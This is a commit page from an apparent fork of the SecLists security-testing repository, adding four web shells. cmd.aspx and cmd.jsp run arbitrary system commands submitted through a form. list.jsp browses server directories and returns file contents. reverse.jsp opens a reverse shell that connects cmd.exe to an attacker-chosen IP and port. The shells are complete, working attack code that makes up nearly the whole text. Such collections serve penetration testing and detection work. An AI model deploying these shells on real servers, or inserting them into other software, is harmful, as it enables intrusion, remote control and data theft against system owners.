idan/SecLists
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Fix #259 - Recover from bad merge

Browse Source
This commit is contained in:
g0tmi1k
2019-01-07 15:40:56 +00:00
parent f12997e268
commit 5e1dc9cc79
60 changed files with 18630792 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Web-Shells/FuzzDB/cmd.aspx
Executable
+42
View File
@@ -0,0 +1,42 @@
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string ExcuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdExe_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>
<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
<!-- http://michaeldaw.org 04/2007 -->
Web-Shells/FuzzDB/cmd.jsp
Executable
+35
View File
@@ -0,0 +1,35 @@
<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
Web-Shells/FuzzDB/list.jsp
Executable
+77
View File
@@ -0,0 +1,77 @@
<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// list.jsp = Directory & File View
//
// by: Sierra
// modified: 27/06/2003
//
%>
<%
if(request.getParameter("file")==null) {
%>
<HTML><BODY>
<FORM METHOD="POST" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="file">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<%
}
%>
<% //read the file name.
try {
File f = new File(request.getParameter("file"));
if(f.isDirectory()) {
int i;
String fname = new String("Unknown");
String fcolor = new String("Black");
%>
<HTML><BODY>
<FONT Face="Courier New, Helvetica" Color="Black">
<%
out.print("<B>Path: <U>" + f.toString() + "</U></B><BR> <BR>");
File flist[] = f.listFiles();
for(i=0; i<flist.length; i++) {
fname = new String( flist[i].toString());
out.print("(");
if(flist[i].isDirectory() == true) {
out.print("d");
fname = fname + "/";
fcolor = new String("Blue");
} else if( flist[i].isFile() == true ) {
out.print("-");
fcolor = new String("Green");
} else {
out.print("?");
fcolor = new String("Red");
}
if(flist[i].canRead() == true) out.print("r" ); else out.print("-");
if(flist[i].canWrite() == true) out.print("w" ); else out.print("-");
out.print(") <A Style='Color: " + fcolor.toString() + ";' HRef='?file=" + fname.toString() + "'>" + fname.toString() + "</A> " + "( Size: " + flist[i].length() + " bytes)<BR>\n");
}
%>
</FONT></BODY></HTML>
<%
} else {
if(f.canRead() == true) {
InputStream in = new FileInputStream(f);
ServletOutputStream outs = response.getOutputStream();
int left = 0;
try {
while((left) >= 0 ) {
left = in.read();
outs.write(left);
}
} catch(IOException ex) {ex.printStackTrace();}
outs.flush();
outs.close();
in.close();
} else {
out.print("Can't Read file<BR>");
}
}
} catch(Exception ex) {ex.printStackTrace();}
%>
Web-Shells/FuzzDB/reverse.jsp
Executable
+91
View File
@@ -0,0 +1,91 @@
// backdoor.jsp
// http://www.security.org.sg/code/jspreverse.html
<%@
page import="java.lang.*, java.util.*, java.io.*, java.net.*"
% >
<%!
static class StreamConnector extends Thread
{
InputStream is;
OutputStream os;
StreamConnector(InputStream is, OutputStream os)
{
this.is = is;
this.os = os;
}
public void run()
{
BufferedReader isr = null;
BufferedWriter osw = null;
try
{
isr = new BufferedReader(new InputStreamReader(is));
osw = new BufferedWriter(new OutputStreamWriter(os));
char buffer[] = new char[8192];
int lenRead;
while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
{
osw.write(buffer, 0, lenRead);
osw.flush();
}
}
catch (Exception ioe)
try
{
if(isr != null) isr.close();
if(osw != null) osw.close();
}
catch (Exception ioe)
}
}
%>
<h1>JSP Backdoor Reverse Shell</h1>
<form method="post">
IP Address
<input type="text" name="ipaddress" size=30>
Port
<input type="text" name="port" size=10>
<input type="submit" name="Connect" value="Connect">
</form>
<p>
<hr>
<%
String ipAddress = request.getParameter("ipaddress");
String ipPort = request.getParameter("port");
if(ipAddress != null && ipPort != null)
{
Socket sock = null;
try
{
sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
Runtime rt = Runtime.getRuntime();
Process proc = rt.exec("cmd.exe");
StreamConnector outputConnector =
new StreamConnector(proc.getInputStream(),
sock.getOutputStream());
StreamConnector inputConnector =
new StreamConnector(sock.getInputStream(),
proc.getOutputStream());
outputConnector.start();
inputConnector.start();
}
catch(Exception e)
}
%>
<!-- http://michaeldaw.org 2006 -->